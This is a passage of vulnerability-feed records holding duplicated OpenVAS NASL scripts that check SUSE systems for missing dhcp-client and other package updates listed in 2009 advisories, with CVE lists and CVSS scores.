"SuSE Security Advisory SUSE-SA:2009:037 (dhcp-client)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-3655", "CVE-2009-1886", "CVE-2009-1904", "CVE-2009-2042", "CVE-2008-3443", "CVE-2009-0642", "CVE-2008-3657", "CVE-2009-0692", "CVE-2008-3905", "CVE-2008-3790", "CVE-2009-1888", "CVE-2008-3656"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064425", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064425", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_037.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:037 (dhcp-client)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The DHCP client (dhclient) could be crashed by a malicious DHCP\nserver sending an overlong subnet field (CVE-2009-0692).\n\nIn theory a malicious DHCP server could exploit the flaw to execute\narbitrary code as root on machines using dhclient to obtain network\nsettings. Newer distributions (SLES10+, openSUSE) do have buffer\noverflow checking that guards against this kind of stack overflow\nthough. So actual exploitability is rather unlikely.\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:037\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:037.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64425\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-0642\", \"CVE-2008-3905\", \"CVE-2008-3790\", \"CVE-2008-3656\", \"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3657\", \"CVE-2009-1904\", \"CVE-2009-1886\", \"CVE-2009-1888\", \"CVE-2009-2042\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:037 (dhcp-client)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debugsource\", rpm:\"dhcp-debugsource~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debugsource\", rpm:\"dhcp-debugsource~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.6~24.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.6~24.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.6~24.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.6~24.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.6~24.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:17", "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:037.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "SuSE Security Advisory SUSE-SA:2009:037 (dhcp-client)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-3655", "CVE-2009-1886", "CVE-2009-1904", "CVE-2009-2042", "CVE-2008-3443", "CVE-2009-0642", "CVE-2008-3657", "CVE-2009-0692", "CVE-2008-3905", "CVE-2008-3790", "CVE-2009-1888", "CVE-2008-3656"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:64425", "href": "http://plugins.openvas.org/nasl.php?oid=64425", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_037.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:037 (dhcp-client)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The DHCP client (dhclient) could be crashed by a malicious DHCP\nserver sending an overlong subnet field (CVE-2009-0692).\n\nIn theory a malicious DHCP server could exploit the flaw to execute\narbitrary code as root on machines using dhclient to obtain network\nsettings. Newer distributions (SLES10+, openSUSE) do have buffer\noverflow checking that guards against this kind of stack overflow\nthough. So actual exploitability is rather unlikely.\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:037\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:037.\";\n\n \n\nif(description)\n{\n script_id(64425);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-0642\", \"CVE-2008-3905\", \"CVE-2008-3790\", \"CVE-2008-3656\", \"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3657\", \"CVE-2009-1904\", \"CVE-2009-1886\", \"CVE-2009-1888\", \"CVE-2009-2042\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:037 (dhcp-client)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debugsource\", rpm:\"dhcp-debugsource~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.1.1~6.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debugsource\", rpm:\"dhcp-debugsource~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.6~86.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.6~24.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.6~24.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.6~24.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.6~24.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.6~24.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:46", "description": "The remote host is missing updates announced in\nadvisory SUSE-SR:2009:005. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.", "cvss3": {}, "published": "2009-03-02T00:00:00", "type": "openvas", "title": "SuSE Security Summary SUSE-SR:2009:005", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0021", "CVE-2007-0062", "CVE-2008-5138", "CVE-2009-0397", "CVE-2009-0040", "CVE-2009-0478", "CVE-2009-0386", "CVE-2009-0387", "CVE-2009-0599", "CVE-2009-0049", "CVE-2009-0600", "CVE-2008-5078", "CVE-2009-0601"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:63469", "href": "http://plugins.openvas.org/nasl.php?oid=63469", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sr_2009_005.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SR:2009:005\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SR:2009:005. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.\";\n\ntag_solution = \"Update all out of date packages.\";\n \nif(description)\n{\n script_id(63469);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-02 19:11:09 +0100 (Mon, 02 Mar 2009)\");\n script_cve_id(\"CVE-2007-0062\", \"CVE-2008-5078\", \"CVE-2008-5138\", \"CVE-2009-0021\", \"CVE-2009-0040\", \"CVE-2009-0049\", \"CVE-2009-0386\", \"CVE-2009-0387\", \"CVE-2009-0397\", \"CVE-2009-0478\", \"CVE-2009-0599\", \"CVE-2009-0600\", \"CVE-2009-0601\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Summary SUSE-SR:2009:005\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"eID-belgium\", rpm:\"eID-belgium~2.6.0~73.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~9.0.159.0~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-good\", rpm:\"gstreamer-0_10-plugins-good~0.10.7~38.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-good-doc\", rpm:\"gstreamer-0_10-plugins-good-doc~0.10.7~38.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-good-extra\", rpm:\"gstreamer-0_10-plugins-good-extra~0.10.7~38.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-good-lang\", rpm:\"gstreamer-0_10-plugins-good-lang~0.10.7~38.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"keyutils\", rpm:\"keyutils~1.2~80.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"keyutils-devel\", rpm:\"keyutils-devel~1.2~80.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"keyutils-libs\", rpm:\"keyutils-libs~1.2~80.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.26~14.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng3\", rpm:\"libpng3~1.2.26~14.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng12-0\", rpm:\"libpng12-0~1.2.26~14.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nagios\", rpm:\"nagios~3.0.6~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nagios-devel\", rpm:\"nagios-devel~3.0.6~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nagios-www\", rpm:\"nagios-www~3.0.6~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.4p4~44.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ntp-doc\", rpm:\"ntp-doc~4.2.4p4~44.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pam_mount\", rpm:\"pam_mount~0.35~15.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.0~17.9\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wireshark-devel\", rpm:\"wireshark-devel~1.0.0~17.9\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"eID-belgium\", rpm:\"eID-belgium~2.5.9~119.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~9.0.159.0~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer010-plugins-good\", rpm:\"gstreamer010-plugins-good~0.10.6~41.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer010-plugins-good-doc\", rpm:\"gstreamer010-plugins-good-doc~0.10.6~41.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer010-plugins-good-extra\", rpm:\"gstreamer010-plugins-good-extra~0.10.6~41.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng\", rpm:\"libpng~1.2.18~15.10\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.18~15.10\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pam_mount\", rpm:\"pam_mount~0.18~84.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~0.99.6~31.15\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wireshark-devel\", rpm:\"wireshark-devel~0.99.6~31.15\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xntp\", rpm:\"xntp~4.2.4p3~25.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xntp-doc\", rpm:\"xntp-doc~4.2.4p3~25.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:55", "description": "The remote host is missing updates announced in\nadvisory SUSE-SR:2009:005. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.", "cvss3": {}, "published": "2009-03-02T00:00:00", "type": "openvas", "title": "SuSE Security Summary SUSE-SR:2009:005", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0021", "CVE-2007-0062", "CVE-2008-5138", "CVE-2009-0397", "CVE-2009-0040", "CVE-2009-0478", "CVE-2009-0386", "CVE-2009-0387", "CVE-2009-0599", "CVE-2009-0049", "CVE-2009-0600", "CVE-2008-5078", "CVE-2009-0601"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063469", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063469", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sr_2009_005.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory SUSE-SR:2009:005\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SR:2009:005. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.\";\n\ntag_solution = \"Update all out of date packages.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63469\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-02 19:11:09 +0100 (Mon, 02 Mar 2009)\");\n script_cve_id(\"CVE-2007-0062\", \"CVE-2008-5078\", \"CVE-2008-5138\", \"CVE-2009-0021\", \"CVE-2009-0040\", \"CVE-2009-0049\", \"CVE-2009-0386\", \"CVE-2009-0387\", \"CVE-2009-0397\", \"CVE-2009-0478\", \"CVE-2009-0599\", \"CVE-2009-0600\", \"CVE-2009-0601\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Summary SUSE-SR:2009:005\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"eID-belgium\", rpm:\"eID-belgium~2.6.0~73.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~9.0.159.0~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-good\", rpm:\"gstreamer-0_10-plugins-good~0.10.7~38.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-good-doc\", rpm:\"gstreamer-0_10-plugins-good-doc~0.10.7~38.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-good-extra\", rpm:\"gstreamer-0_10-plugins-good-extra~0.10.7~38.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-good-lang\", rpm:\"gstreamer-0_10-plugins-good-lang~0.10.7~38.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"keyutils\", rpm:\"keyutils~1.2~80.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"keyutils-devel\", rpm:\"keyutils-devel~1.2~80.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"keyutils-libs\", rpm:\"keyutils-libs~1.2~80.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.26~14.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = 